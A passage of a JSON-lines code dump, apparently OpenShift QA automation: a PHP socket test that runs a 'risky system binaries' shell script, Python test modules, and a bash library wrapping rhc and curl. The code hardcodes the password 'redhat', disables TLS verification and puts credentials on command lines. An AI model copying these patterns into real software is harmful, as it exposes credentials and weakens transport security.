}\n \n echo \"Send Command..........\\n\";\n $in = \"quit\\n\";\n $result = socket_write($socket, $in, strlen($in));\n if ($result === false) {\n $error_id = socket_last_error();\n echo \"Error: \".$error_id.\" - \".socket_strerror($error_id).\"\\n\";\n echo \"SOCKET WRITE: Fail-3. \\n\";\n } else {\n echo \"SOCKET WRITE: OK-3.\\n\";\n }\n \n echo \"Close socket........\\n\";\n $result = socket_close($socket);\n if ($result === false) {\n $error_id = socket_last_error();\n echo \"Error: \".$error_id.\" - \".socket_strerror($error_id).\"\\n\";\n echo \"SOCKET CLOSE: Fail-4. 
\\n\";\n } else {\n echo \"SOCKET CLOSE: OK-4.\\n\";\n }\n\n echo \"\\n\\n\\n\";\n\n return $RESULT;\n}\n\necho \"Welcome~~~~~~~\\n\";\n$command = \"/bin/sh execute_risky_system_binaries.sh\";\n$output = run_system_cmd($command);\necho $output;\n\n?>\n" }, { "alpha_fraction": 0.5968477725982666, "alphanum_fraction": 0.5985068678855896, "avg_line_length": 29.91025733947754, "blob_id": "02805e38692a18c72000839e69c952f98a923f21", "content_id": "f29aca9ada995e39bbb77d361d611f5186ec0baf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2411, "license_type": "no_license", "max_line_length": 147, "num_lines": 78, "path": "/automation/open/testmodules/RT/job_related/apps_clean_up.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.user_email = os.environ[\"OPENSHIFT_user_email\"]\n self.user_passwd = os.environ[\"OPENSHIFT_user_passwd\"]\n self.domain_name = common.get_domain_name()\n\n common.env_setup()\n self.steps_list = []\n\n def finalize(self):\n os.system(\"rhc domain delete %s -l %s -p '%s' %s\"% (self.domain_name, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS))\n os.system(\"rm -rf /tmp/OPENSHIFT_OSConf-%s.dump\"%self.user_email)\n\n\nclass AppsCleanUp(OpenShiftTest):\n def test_method(self):\n step = testcase.TestCaseStep(\"Re-inintilize OSConf file\",\n OSConf.initial_conf,\n function_parameters=[],\n expect_return=0\n )\n self.steps_list.append(step)\n \n step = testcase.TestCaseStep(\"Clean all the apps of the user\",\n common.clean_up,\n function_parameters=[self.user_email, self.user_passwd],\n expect_return=0)\n self.steps_list.append(step)\n\n ''' MOVED TO FINALIZE()....\n step = testcase.TestCaseStep(\"Destroy domain namesplace\",\n \"rhc domain delete %s -l %s -p %s\"% (self.domain_name, self.user_email, self.user_passwd),\n expect_return=0)\n self.steps_list.append(step)\n \n step = testcase.TestCaseStep(\"Clean OSConf dump file\",\n \"rm -rf /tmp/OPENSHIFT_OSConf-%s.dump\"%self.user_email,\n expect_return=0)\n self.steps_list.append(step)\n '''\n\n case = testcase.TestCase(\"Clean all the apps of the user\", self.steps_list)\n case.run()\n\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(AppsCleanUp)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5885146856307983, "alphanum_fraction": 0.5924006700515747, "avg_line_length": 31.619718551635742, "blob_id": "1aaafaf5dd992de3fb4aca1339ffa9973d0a6bcf", "content_id": "9b5aeed2d14292c78a6e623b9bbd85ed43efa6a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2316, "license_type": "no_license", "max_line_length": 104, "num_lines": 71, "path": "/automation/open/testmodules/RT/hot_deploy/jbossas_exploded_wars_without_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila 
Nagy\nNov 7, 2012\n\"\"\"\n\nimport os\nimport shutil\nimport rhtest\nimport common\nfrom jbossas_without_jenkins import JBossHotDeployWithoutJenkins\n\nclass JBossHotDeployExplodedWarsWithoutJenkins(JBossHotDeployWithoutJenkins):\n\n def __init__(self, config):\n JBossHotDeployWithoutJenkins.__init__(self, config)\n self.config.summary = \"[US2443] Hot deployment support for Jboss application with exploded wars\"\n self.config.deploy_dir = \"deployments\"\n self.config.app_template_dir = os.path.dirname(__file__) + \"/../cartridge/app_template\"\n self.config.war_files = [ \"weldguess.war\", \"sample.war\" ]\n\n def war(self, operation, war_file):\n war_dir = \"./%s/%s/%s\" % ( self.config.application_name, self.config.deploy_dir, war_file )\n war_dir_marker = war_dir + \".dodeploy\"\n if operation == \"add\":\n # Creating the directory\n os.mkdir(war_dir)\n # Exploding the war file\n steps = [\n \"cd %s\" % war_dir,\n \"jar -xvf %s\" % self.config.app_template_dir + \"/\" + war_file\n ]\n common.command_get_status(\" && \".join(steps))\n # Adding marker\n marker = file(war_dir_marker, \"a\")\n marker.close()\n elif operation == \"remove\":\n # Removing the exploded war\n shutil.rmtree(war_dir)\n os.remove(war_dir_marker)\n # ... and deploying\n self.deploy()\n\n def test_method(self):\n self.enable_jenkins()\n self.enable_hot_deployment()\n self.configuration()\n pid_original = self.get_process_id()\n for war in self.config.war_files:\n self.war(\"add\", war)\n pid_new = self.get_process_id()\n self.verification(pid_original, pid_new)\n for war in self.config.war_files:\n for operation in [ \"remove\", \"add\" ]:\n self.war(operation, war)\n pid_new = self.get_process_id()\n self.verification(pid_original, pid_new)\n \n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(JBossHotDeployExplodedWarsWithoutJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.582194983959198, "alphanum_fraction": 0.5903595685958862, "avg_line_length": 36.24561309814453, "blob_id": "040f154f3683481c8904930b4d8b89c8c6b531bd", "content_id": "bd2c9f20c52d7f87896657309c0a5e2c72be8c99", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6369, "license_type": "no_license", "max_line_length": 152, "num_lines": 171, "path": "/automation/open/testmodules/RT/node/jenkins_builder_size.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nAttila Nagy\[email protected]\nMay 5, 2012\n\n[US2001][Runtime][rhc-node] jenkins show correct builder size in config page\n\"\"\"\n\nimport rhtest\nimport common\nimport OSConf\nimport pycurl\nfrom StringIO import StringIO\nfrom time import sleep\nfrom shutil import rmtree\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n self.summary = \"[US2001][Runtime][rhc-node] jenkins show correct builder size in config page\"\n self.app_name_small = \"myphpsmall\"\n self.app_name_medium = \"myjbossmedium\"\n\n common.env_setup(cleanup=True)\n\n def finalize(self):\n for repo in [ self.app_name_small, self.app_name_medium ]:\n rmtree(repo, ignore_errors = True)\n if self.get_run_mode() == \"DEV\":\n common.change_node_profile(\"small\")\n common.remove_gearsize_capability('medium') #default is small only\n \nclass JenkinsBuilderSize(OpenShiftTest):\n \n def test_method(self):\n # This step is needed to create builder machines\n if self.get_run_mode() == \"DEV\":\n 
common.add_gearsize_capability('medium')\n #\n # Step 1\n #\n self.info(\"1. create jenkins server app\")\n ret_code = common.create_app(\"jenkins\", \n common.app_types[\"jenkins\"], \n clone_repo = False)\n \n self.assert_equal(ret_code, 0, \"Jenkis app must be created successfully\")\n #\n # Step 2 \n #\n self.info(\"2. go to jenkins config page check the builder size\")\n app_cache = OSConf.get_apps()\n self.jenkins_url = app_cache['jenkins']['url']\n self.jenkins_username = app_cache['jenkins']['username']\n self.jenkins_password = app_cache['jenkins']['password']\n sleep(120)\n jenkins_config_output = self.get_jenkins_page(\"configure\")\n \n # Waiting for Jenkins to stand up\n \n str2find='<select name=\"defaultBuilderSize\"><option selected=\"true\" value=\"small\">Small</option><option value=\"medium\">Medium</option></select>'\n self.assert_true(\n jenkins_config_output.find(str2find) != -1,\n \"Drop-down list 'Default Builder Size' must contain options 'Small' and 'Medium' (small as default)\")\n\n #\n # Step 3\n #\n self.info(\"3. create a small gear size app with jenkins enabled\")\n\n ret_code = common.create_app(self.app_name_small, common.app_types[\"php\"])\n self.assert_equal(ret_code, 0, \"App must be created successfully\")\n\n ret_code = common.embed(self.app_name_small, \n \"add-\" + common.cartridge_types[\"jenkins\"])\n self.assert_equal(ret_code, 0, \"Jenkins client must be embed successfully\")\n\n #\n # Step 4\n #\n self.info('4.go to jenkins console and check the application builder size in configure job page')\n jenkins_config_output = self.get_jenkins_page(\"job/%s-build/configure\" % self.app_name_small)\n str2find='<select name=\"builderSize\"><option selected=\"true\" value=\"small\">Small</option>'\n self.assert_true(\n jenkins_config_output.find(str2find) != -1,\n \"Drop-down list 'Default Builder Size' must contain options 'Small' and 'Medium'\"\n )\n #'<select name=\"builderSize\"><option selected=\"true\" value=\"small\">Small </option><option value=\"medium\">Medium</option></select>'\n\n #\n # Step 5\n #\n self.info(\"5.do some change and push the changes\")\n self.assert_true(\n self.deploy_new_file(\"./\" + self.app_name_small).find(\"SUCCESS\") != -1,\n \"Deployment must be successful\"\n )\n\n #\n # Step 6\n #\n if self.get_run_mode() == \"DEV\":\n self.info(\"6.create a medium gear size app with jenkins enabled\")\n common.change_node_profile(\"medium\")\n ret_code = common.create_app(self.app_name_medium, \n common.app_types[\"jbossas\"], \n gear_size = \"medium\")\n self.assert_equal(ret_code, 0, \"App must be created successfully\")\n\n ret_code = common.embed(self.app_name_medium, \n \"add-\" + common.cartridge_types[\"jenkins\"])\n self.assert_equal(ret_code, 0, \"Jenkins client must be embed successfully\")\n\n #\n # Step 7\n #\n self.info(\"7. 
go to jenkins console and check the application builder size in configure job page \")\n jenkins_config_output = self.get_jenkins_page(\"job/%s-build/configure\" % self.app_name_medium)\n str2find='<option selected=\"true\" value=\"medium\">Medium</option>'\n self.assert_true(\n jenkins_config_output.find(str2find) != -1,\n \"Drop-down list 'Default Builder Size' doesn't contain 'Medium' as default\")\n\n #\n # Step 8\n #\n self.info(\"8.do some change and push the changes\")\n self.assert_true(\n self.deploy_new_file(\"./\" + self.app_name_medium).find(\"SUCCESS\") != -1,\n \"Deployment must be successful\")\n\n return self.passed(self.summary)\n\n def get_jenkins_page(self, path):\n output = StringIO()\n curl = pycurl.Curl()\n curl.setopt(pycurl.VERBOSE, 1)\n curl.setopt(pycurl.URL, \"https://\" + self.jenkins_url + \"/\" + path)\n curl.setopt(pycurl.SSL_VERIFYPEER, 0)\n curl.setopt(pycurl.FOLLOWLOCATION, 1)\n curl.setopt(pycurl.WRITEFUNCTION, output.write)\n curl.setopt(pycurl.HTTPAUTH, pycurl.HTTPAUTH_BASIC)\n curl.setopt(pycurl.USERPWD, \"%s:%s\" % (self.jenkins_username, self.jenkins_password))\n curl.perform()\n return output.getvalue()\n\n def deploy_new_file(self, git_repo):\n file = open(git_repo + \"/\" + common.getRandomString(), \"w\")\n file.write(common.getRandomString())\n file.close()\n\n deployment_steps = [\n \"cd %s\" % git_repo,\n \"git add .\",\n \"git commit -a -m testing\",\n \"git push\"\n ]\n\n return common.command_getstatusoutput(\" && \".join(deployment_steps))[1]\n \n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(JenkinsBuilderSize)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5906432867050171, "alphanum_fraction": 0.5961257219314575, "avg_line_length": 31.951807022094727, "blob_id": "2fc18889b795ae285ec0ae11a036330391faff7e", "content_id": "3643ee584783a2daf95ac0aca654d9499bd04ff3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2736, "license_type": "no_license", "max_line_length": 182, "num_lines": 83, "path": "/automation/open/testmodules/RT/node/app_limit_per_user-concurrent_creation.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\n??\n??\n\"\"\"\n\nimport sys\nimport os\nimport string\nimport rhtest\n\nimport testcase\nimport common\nimport OSConf\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.app_limit_per_user = common.get_max_gears() #string.atoi(os.environ[\"OPENSHIFT_app_limit_per_user\"])\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.app_type = common.app_types[\"php\"]\n self.app_name_prefix = common.getRandomString(7)\n\nclass AppLimitPerUserConcurentCreation(OpenShiftTest):\n def test_method(self):\n ret_list = []\n for i in range(3):\n common.env_setup()\n step = testcase.TestCaseStep(\n \"Try %s: Create more apps than app_limit_per_user setting upon %s concurrent creation\" %(i + 1, self.app_limit_per_user + 2),\n self.concrrent_creation_step,\n function_parameters=[1, self.app_limit_per_user + 2],\n expect_description=\"No more apps beyond limit should be created\")\n\n (ret_dict, output) = step.run()\n # print ret_dict\n if ret_dict.values().count(0) == self.app_limit_per_user:\n ret_list.append(0)\n # Init OSConf to clean these apps in next iterval\n OSConf.initial_conf()\n else:\n ret_list.append(1)\n # 
# Init OSConf to clean these apps in next script\n                OSConf.initial_conf()\n                break\n\n\n        #print ret_list\n        if ret_list.count(1) > 0:\n            print \"Upon %s concurrent creation, more apps than app_limit_per_user are created - [FAIL]\" %(self.app_limit_per_user + 2)\n            return self.failed(\"%s failed\" % self.__class__.__name__)\n        else:\n            return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\n    def concurrent_creation_step(self, start, end):\n        command_list = []\n        for i in range(start, end + 1):\n            self.app_name = \"%s%s\" %(self.app_name_prefix, i)\n            command_list.append(\"rhc app create %s %s -l %s -p '%s' --no-git %s\" %(self.app_name, self.app_type, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS))\n\n        ret_dict = common.multi_subprocess(command_list)\n        for i in ret_dict.keys():\n            print \"Command {%s} return: %s\" %(i, ret_dict[i])\n\n        return ret_dict\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(AppLimitPerUserConcurrentCreation)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5431665778160095, "alphanum_fraction": 0.5583605766296387, "avg_line_length": 29.05620574951172, "blob_id": "158d680492ce19ce306a42627a57cc5f196146af", "content_id": "efceae9f49ee64a6d0fec9483e843dc75dead22", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 12834, "license_type": "no_license", "max_line_length": 229, "num_lines": 427, "path": "/automation/open/Longevity/function.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n###################################################\n# FileName: common_func.sh\n# Author: <[email protected]> \n# Description: provide the common functions for all test cases\n# Version: 1.0\n#*************************************************\n### Function List:\n#rhc_setup Setup rhc domain automation\n#app_create Create a new app\n#app_snapshot Snapshot app\n#app_restore Restore app from backup\n#app_delete Delete a new app according to app_name\n#app_delete_all Delete all apps\n#cartridge_add Add a cartridge to the assigned app\n#cartridge_remove Remove a cartridge from assigned app\n#cartridge_oper_testing Testing cartridge operations\n#add_hot_deploy Hot_deploy function added to assigned app\n#add_disable_auto_scaling Disable auto scaling function to assigned app\n#ssh_app SSH login to the assigned app\n#app_service_pid Get app services pid\n#add_jenkins_client Added jenkins_client to app\n#rest_api REST API function; now we support create/scale-up/scale-down\n#rest_api_delete Delete all (apps, domain...) using rest api command\n#alias_add Alias add to an app\n#alias_remove Alias remove from an app\n#url_check Check the app web service available\n#scale_check Scale-up/scale-down check\n#app_oper_testing App operation testing, stop/reload/start...\n#set_running_parameter Setup testing environment\n#add_mysql_data Insert test data into the app's MySQL database\n#delete_mysql_data Delete test data from the app's MySQL database\n###################################################\n\n
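# Source shared helpers (echo_bold/echo_blue/run, etc.); they are expected to come from common_func.sh.\n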
. ./common_func.sh\n[ -f /usr/bin/expect ] || yum install expect -y\ngit config --global user.name \"Sun Ning\"\ngit config --global user.email \"[email protected]\"\npwd=`pwd`\nCONFIG_FILE=$pwd/AutoCreate.cfg\n#time=`date +%Y%m%d-%H%M%S`\n\nuser=`cat ~/.openshift/express.conf|grep default_rhlogin|awk -F= '{print $2}'`\npasswd=redhat\ndomain=`rhc domain show -predhat|sed -n 1p|awk '{print $3}'`\napp_number=`rhc domain show -p$passwd|grep uuid|wc -l`\nbroker_url=`cat ~/.openshift/express.conf|grep -i libra_server|awk -F= '{print $2}'`\n\n\n#####################\n# $0 $user\n# default password is \"redhat\"\n#return value\n#####################\nrhc_setup()\n{\n    [ $# -ne 1 ] && echo \"Please input correct format. such as: rhc_setup username\" && return 1\n    domain_name=\"sun$(date +%m%d)\"\n    expect -f - <<EOF\n    spawn rhc setup\n    expect {\n        \"enter your OpenShift login (email or Red Hat login id):*\" {send \"$1\\r\";exp_continue}\n        \"Password:\" {send \"$passwd\\r\";exp_continue}\n        \"Checking for your namespace ... found namespace:*\" {send \"$domain_name\\r\"}\n    }\nwait\nEOF\nrhc domain show > /dev/null\n[ $? -eq 0 ] && value=0 || value=1\nreturn $value\n}\n\n\n#####################\n# $0 $app_type $scalable\n#####################\napp_create()\n{\n\tif [ $# -eq 2 ] && [ \"$2\" = \"-s\" ];then\n\t\tapp_name=${1%-*}${app_number}s\n\t\tcreate_command=\"rhc app create $app_name $1 -p${passwd} -s --timeout 360\" \n\telif [ $# -eq 1 ];then \n\t\tapp_name=${1%-*}${app_number}\n\t\tcreate_command=\"rhc app create $app_name $1 -p${passwd} --timeout 360\" \n\tfi\t\n\techo_bold \"The newly created app NO. is : $app_number \"\n\techo_bold \"$create_command\"\n\texpect -f - <<EOF\n\tset timeout -1\n\tspawn $create_command\n\texpect {\n\t\t\t\t\"Are you *(yes/no)?\"\t{send \"yes\\r\";exp_continue}\n\t\t\t}\n\twait\nEOF\n\trhc app show $app_name -p${passwd} &>/dev/null\n\t[ $? -eq 0 ] && value=0 || value=1\n\t#[ -d $app_name ] && value=0 || value=1\n\tapp_number=$(($app_number + 1))\n\techo_blue \"Already have $app_number applications created!\"\n\treturn \"$value\"\n}\n\n#####################\n# $0 $app_name\n#####################\napp_snapshot()\n{\n\trhc snapshot save $1 -predhat\n}\n#####################\n# $0 $app_name $app_name\n# Source Target\n#####################\napp_restore()\n{\n\techo_bold \"rhc snapshot restore -f ${1}.tar.gz -a $2 -predhat\"\n\trhc snapshot restore -f ${1}.tar.gz -a $2 -predhat\n}\n\n#####################\n# $0 $app_name\n#####################\napp_delete()\n{\n    echo_bold \"The delete app NO. is : $app_number\"\n\techo_bold \"rhc app delete $1 -p${passwd}\"\n\texpect -f - <<EOF\n\tset timeout -1\n\tspawn rhc app delete $1 -p${passwd} --timeout 360\n\texpect {\n\t\t\t\t\"Are you *(yes|no):\"\t{send \"yes\\r\";exp_continue}\n\t\t\t}\n\twait\nEOF\n\tapp_number=$(($app_number - 1))\n    rhc app show $1 -p${passwd} &>/dev/null\n    [ $? -ne 0 ] && value=0 || value=1\n    return $value\n}\n#no parameter\napp_delete_all()\n{\n\tapps=`rhc domain show -p${passwd}|grep uuid|awk '{print $1}'`\n\techo_blue \"All APPs: $apps\"\n\tvalue=0\n\tfor app in $apps;do\n\t\trun app_delete $app\n\t\t
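# Stop at the first failed deletion; value records the failure for the caller.\n\t\t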
[ $? -ne 0 ] && value=1 && break\n\tdone\n    return $value\n}\n\n##########################\n# $0 $cartridge_type $app_name\n##########################\ncartridge_add()\n{\n\techo_bold \"rhc cartridge add $1 -a $2 -p${passwd} --timeout 360\"\n\trhc cartridge add $1 -a $2 -p${passwd} --timeout 360\n    value=$?\n    return $value\n}\n##########################\n# $0 $cartridge_type $app_name\n##########################\ncartridge_remove()\n{\n\techo_bold \"rhc cartridge remove $1 -a $2 -p${passwd} --confirm\"\n\trhc cartridge remove $1 -a $2 -p${passwd} --confirm\n}\n\n#################################\n# $0 $cartridge_type $app_name\n#################################\ncartridge_oper_testing()\n{\n    for oper in $cart_operations;do\n    \techo_bold \"rhc cartridge $oper $1 -a $2 -predhat\"\n    \trhc cartridge $oper $1 -a $2 -predhat\n        [ $? -ne 0 ] && value=1 && break\n    done\n}\n#################################\n# $0 $app_name\n#################################\nadd_hot_deploy()\n{\n\tcd $1\n\ttouch .openshift/markers/hot_deploy\n\tgit add .; git commit -am \"Add hot_deploy\" ;git push\n\tcd -\n}\n\nadd_disable_auto_scaling()\n{\n\tcd $1\n\ttouch .openshift/markers/disable_auto_scaling\n\tgit add . && git commit -am \"Add disable_auto_scaling\" && git push\n    [ $? -eq 0 ] && value=0 || value=1\n\tcd -\n}\n\nssh_app()\n{\nif [ \"$#\" == \"1\" ];then\n\t #app_path=`rhc domain show -paaa|grep $1|grep \"SSH URL\"|awk -F'//' '{print $2}'`\n\t\tapp_path=`rhc app show -a $1 -p$passwd|grep -A0 \"SSH:\"|awk '{print $2}'`\n\t\techo \"$1 SSH path is : $app_path\"\n\t\tcd \n\t\tssh $app_path\nelse\n\t\techo \"Please input your App name.\"\n\t\techo \"Such as : $0 app1\"\nfi\n}\n\n#################################################################################\n#$0 $app_name $command\n#################################################################################\ntask_ssh_app()\n{\ncommand='mysql -Druby0 -e \"create table test(id int(8), name char(20));insert into test values('0','openshift');select * from test;\"'\napp_path=`rhc app show -a $1 -p$passwd|grep -A0 \"SSH:\"|awk '{print $2}'`\necho \"$1 SSH path is : $app_path\"\nexpect -f - <<EOF\nset timeout -1\nspawn ssh $app_path\nexpect {\n    \"*>\" {send \"$command\\r\";exp_continue}\n}\nwait\nEOF\n}\n\napp_service_pid()\n{\n\tapp_path=`rhc app show -a $1 -p$passwd|grep -A0 \"SSH:\"|awk '{print $2}'`\n\techo \"$1 SSH path is : $app_path\"\n\tcd $1\n\tif [[ \"$1\" =~ ^jbossas ]] || [[ \"$1\" =~ ^jbosseap ]];then\n\t\tpids=`ssh $app_path ps -ef|grep -i standalone|grep -v grep|awk '{print $2}'`\n\telif [[ \"$1\" =~ ^jbossews ]];then\n\t\tpids=`ssh $app_path ps -ef|grep jre|grep -v grep|awk '{print $2}'`\t\n\telse\n\t\tpids=`ssh $app_path ps -ef|grep -i bin/httpd|grep -v grep|awk '{print $2}'`\n\tfi\n\tcd -\n}\n\nadd_jenkins_client()\n{\n\tspawn rhc cartridge add jenkins-client -a $app -predhat\n}\n\n###################################\n#parameter 2\n# $0 action app_type/app_name\t\n###################################\nrest_api()\n{\n\tif [ \"$1\" = \"create\" ];then\n\t\tapp_type=$2\n\t\tapp_name=${app_type%-*}${app_number}s\n\t\tcurl -k -H \"Accept: application/xml\" --user \"$user:$passwd\" https://$broker_url/broker/rest/domains/$domain/applications -X POST -d name=$app_name -d cartridge=$app_type -d scale=true\n\t\t[ $? -ne 0 ] && return $? 
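\n\t\t# The expect block below answers the interactive \"Are you ...(yes/no)?\" SSH host-key prompt on first contact.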
\n\t\t#git clone $(rhc app show $app_name -p$passwd|grep \"Git URL\"|awk '{print $3}')\n\t\texpect -f - <<EOF\n\t\tset timeout -1\n\t\tspawn rhc git-clone $app_name -p$passwd\n\t\texpect {\n\t\t\t\"Are you *(yes/no)?\" {send \"yes\\r\";exp_continue}\n\t\t}\n\t\twait\nEOF\n\telif [ \"$1\" = \"scale-up\" ] || [ \"$1\" = \"scale-down\" ];then\n\t\tapp=$2\n\t\techo_bold \"curl -k -H \"Accept: application/xml\" --user \"$user:$passwd\" https://$broker_url/broker/rest/domains/$domain/applications/$app/events -X POST -d event=$1\"\n\t\tcurl -k -H \"Accept: application/xml\" --user \"$user:$passwd\" https://$broker_url/broker/rest/domains/$domain/applications/$app/events -X POST -d event=$1\n\t\treturn $?\n\tfi\n}\n\n####################################\n#parameter number 1 or 2\n# $0 $app_name [$check_content]\n####################################\nurl_check()\n{\n\tcheck_name=$1\n#\tcurl http://p53-sun0131.p0129.com/read.php\n\t[ -n \"$2\" ] && check_content=$2 || check_content=\"Welcome to OpenShift\"\n\techo_bold \"curl http://$check_name-$domain.${broker_url#*.}|grep $check_content\"\n\tcurl http://$check_name-$domain.${broker_url#*.}|grep \"$check_content\"\n    value=$?\n\t[ $value -eq 0 ] && echo_green \"Access $check_name Succeeded!\" || echo_red \"Access $check_name Failed!\"\n    return $value\n}\n\n#parameter number 2\n# $0 $app_name $action_type\nscale_check()\n{\n\tapp_path=`rhc app show -a $1 -p$passwd|grep -A0 \"SSH:\"|awk '{print $2}'`\n\tscp $app_path:./haproxy-1.4/conf/haproxy.cfg .\n    gears=$(curl -k -H \"Accept: application/xml\" --user \"${user}:${passwd}\" https://${broker_url}/broker/rest/domains/${domain}/applications/${1}/gears.json -X GET |python -mjson.tool|grep proxy_host|egrep -v \"null|$1\")\n    gears_num=$(curl -k -H \"Accept: application/xml\" --user \"${user}:${passwd}\" https://${broker_url}/broker/rest/domains/${domain}/applications/${1}/gears.json -X GET |python -mjson.tool|grep proxy_host|egrep -v \"null|$1\"|wc -l)\n    echo_blue \"Have gears after $2: $gears\"\n    value=0\n\t if [ $gears_num -ge 2 ] && [ \"$2\" = \"scale-up\" ];then\n\t\t\t echo_green \"Scale-up succeeded!\"\n\t\t\t cat haproxy.cfg |grep \"$domain\"\n\telif [ $gears_num -eq 1 ] && [ \"$2\" = \"scale-down\" ];then\n\t\techo_green \"Scale-down succeeded!\"\n\t\tcat haproxy.cfg |grep \"$domain\"\n\telse\n\t\t\techo_red \"$2 failed!\"\n            value=1\n\tfi\n    return $value\n}\n\n#app management testing\napp_oper_testing()\n{\n    for oper in $app_operations;do\n    \techo_bold \"rhc app $oper $1 -p$passwd\"\n    \trhc app $oper $1 -p$passwd\n        [ $? 
-ne 0 ] && value=1 && break\n done\n}\n\n#no parameter\nset_running_parameter()\n{\n\tSAVEDIFS=$IFS\n\tIFS='='\n\twhile read NAME VALUE\n\tdo\n\t\tcase $NAME in\n\t\t\t\\#*)\n\t\t\t\t;; #ignore comments\n\t\t\tcartridges)\n\t\t\t\tcartridges=$VALUE\n\t\t\t\t;;\n\t\t\tapp_types)\n\t\t\t\tapp_types=$VALUE\n\t\t\t\t;;\n \t\tapp_operations)\n \t\t\t app_operations=$VALUE\n\t\t\t\t;;\n\t\t\tcart_operations)\n\t\t\t\tcart_operations=$VALUE\n\t\tesac\n\tdone < $CONFIG_FILE\n\tIFS=$SAVEDIFS\n\techo_blue \"App types are :$app_types\"\n\techo_blue \"cartridges are :$cartridges\"\n}\n\n#rest_api delete all app and domain\nrest_api_delete()\n{\n\techo_bold \"curl -k -X DELETE -H 'Accept: application/xml' -d force=true --user ${user}:${passwd} https://${broker_url}/broker/rest/domains/$domain\"\n\tcurl -k -X DELETE -H 'Accept: application/xml' -d force=true --user ${user}:${passwd} https://${broker_url}/broker/rest/domains/$domain\n}\n\n#############################################\n# $0 $app_name $alias_string\n#############################################\nalias_add()\n{\n\techo_bold \"rhc alias add $2 ${1}.onpremise.com -p${passwd}\"\n\trhc alias add $2 ${1}.onpremise.com -p${passwd}\n}\n#############################################\n# $0 $app_name $alias_string\n#############################################\nalias_remove()\n{\n\techo_bold \"rhc alias remove $2 ${1}.onpremise.com -p${passwd}\"\n\trhc alias remove $2 ${1}.onpremise.com -p${passwd}\n}\n###########################################\n# $0 $app_name\n###########################################\nadd_mysql_data()\n{\napp_path=`rhc app show -a $1 -predhat|grep -A0 \"SSH:\"|awk '{print $2}'`\necho \"$1 SSH path is : $app_path\"\ncartridge_dir=`ssh $app_path env|grep OPENSHIFT_PRIMARY_CARTRIDGE_DIR|cut -d'=' -f2`\nsql_file=\"mysql_insert.sql\"\necho \"App Path: $app_path, Cartridge_dir: $cartridge_dir\"\n\nscp $sql_file $app_path:$cartridge_dir\n\nexpect -f - <<EOF\nspawn ssh $app_path \nexpect {\n\t\"\\['$1'*>\"\t\t\t{ send \"mysql -D'$1' < '$cartridge_dir'/'$sql_file'\\r\" }\n}\nsleep 1\nEOF\n}\n\n###########################################\n# $0 $app_name\n###########################################\ndelete_mysql_data()\n{\napp_path=`rhc app show -a $1 -predhat|grep -A0 \"SSH:\"|awk '{print $2}'`\necho \"$1 SSH path is : $app_path\"\ncartridge_dir=`ssh $app_path env|grep OPENSHIFT_PRIMARY_CARTRIDGE_DIR|cut -d'=' -f2`\nsql_file=\"mysql_delete.sql\"\necho \"App Path: $app_path, Cartridge_dir: $cartridge_dir\"\nscp $sql_file $app_path:$cartridge_dir\n\nexpect -f - <<EOF\nspawn ssh $app_path \nexpect {\n \"\\['$1'*>\" { send \"mysql -D'$1' < '$cartridge_dir'/'$sql_file'\\r\" }\n}\nsleep 1\nEOF\n}\n" }, { "alpha_fraction": 0.7326607704162598, "alphanum_fraction": 0.746532142162323, "avg_line_length": 27.321428298950195, "blob_id": "36da87090ee4f1ce4741cac1b08f08ef0531f133", "content_id": "eab4e10bdb8ab3f24ef13db378134b4b796b3eaa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 793, "license_type": "no_license", "max_line_length": 112, "num_lines": 28, "path": "/automation/open/testmodules/RT/hot_deploy/jbosseap_prebuilt_wars_without_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nNov 7, 2012\n\"\"\"\n\nimport rhtest\nimport 